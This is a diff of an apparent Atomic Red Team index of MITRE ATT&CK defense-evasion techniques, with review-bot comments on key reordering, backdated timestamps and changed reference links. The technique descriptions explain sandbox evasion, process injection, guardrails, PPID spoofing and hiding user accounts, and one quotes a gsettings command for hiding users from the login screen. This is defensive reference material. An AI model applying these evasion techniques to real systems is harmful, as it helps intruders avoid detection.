- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1036.004:
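Review bot: the T1550.003 reference list in this hunk is reordered (CERT-EU moves to the top, GentilKiwi and ADSecurity move down), and the one substantive change is easy to miss in that noise: the GentilKiwi Pass the Ticket URL is replaced by a `web.archive.org/web/20210515214027/` snapshot with retrieval date September 12, 2024, which is the right fix for a dead link. The `x_mitre_modified_by_ref` removed in the previous hunk is re-added at the end of the record here, so no field is actually lost.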
@@ -7225,7 +7342,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests: []
T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
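Review bot: the Deloitte Environment Awareness reference for T1497 changes its URL from `.../1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc` to the same file id with an `/edit` suffix and a new retrieval date of September 13, 2024; the `/edit` form is the Drive editor view, so confirm it resolves for readers without edit access before the generated docs pick it up. As elsewhere in the patch, the `-`/`+` churn around it is a key reorder (the id, created and marking fields removed earlier in the object are re-emitted here).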
T1218.005:
technique:
@@ -7989,7 +8094,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
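Review bot: the substantive changes to T1480 are hard to see because the whole object is re-emitted in a new key order; the lines that actually matter are the user-agent paragraph appended to the description with its new `Trellix-Qakbot` reference, `x_mitre_version` moving from '1.1' to '1.2', and `x_mitre_attack_spec_version` moving from 2.1.0 to 3.2.0, while everything from `x_mitre_platforms` down to `object_marking_refs` is only relocated. If the generator can keep a stable key order, future bumps will diff as a handful of lines instead of a full rewrite; failing that, the commit message should say that most of this hunk is reordering. Also, `modified: '2022-05-24T14:00:00.188Z'` is removed here but its replacement is not in this hunk, so please confirm the new `modified` value landed earlier in the object.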
@@ -8146,7 +8255,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
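Review bot: `modified` for T1205.001 moves backwards, from '2022-05-11T14:00:00.188Z' to '2022-03-11T18:31:23.996Z', and the same regression repeats below for T1564.002, T1562.003, T1556.008, T1134.004, T1055.014, T1574.010, T1574.013, T1542.004, T1070.005, T1601, T1027.005, T1564.009, T1036.001 and T1564.006. A timestamp going back in time on an object whose content is otherwise unchanged usually means the index was regenerated from a different upstream bundle (all of the old values share the same `:00.188Z` or `:39.188Z` seconds, the new ones look like per-object edit times). Please state in the PR which ATT&CK STIX release this was built from, and check that any consumer that compares `modified` to decide whether a technique changed will not treat every one of these as stale or regressed.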
@@ -8197,8 +8305,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
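Review bot: this hunk drops both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1205.001, and no replacement `x_mitre_attack_spec_version` appears in any other hunk for this object, so the technique ends up with no ATT&CK spec version at all; the same happens to T1574.013, T1542.004, T1601, T1036.001 and T1564.006 further down. Removing the STIX `spec_version` everywhere is consistent, but for these objects the behaviour differs from T1480 (bumped to 3.2.0) and from T1564.002 (kept at 2.1.0 as context). Either preserve or bump the field for these, or note in the PR that the upstream objects genuinely lack it.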
@@ -8259,7 +8365,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests: []
T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
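Review bot: in the re-emitted `external_references` for T1497.002 the Deloitte entry changes from `https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc` to the same id with `/edit` appended, and the retrieval date moves from May 18, 2021 to September 13, 2024; please confirm the `/edit` form resolves for a reader without access to that Drive account, since the bare file link is the one that was previously verified. The rest of the hunk is the same reference list in reverse order plus the fields relocated from the top of the object, so there is no other content change here.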
@@ -8736,7 +8838,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
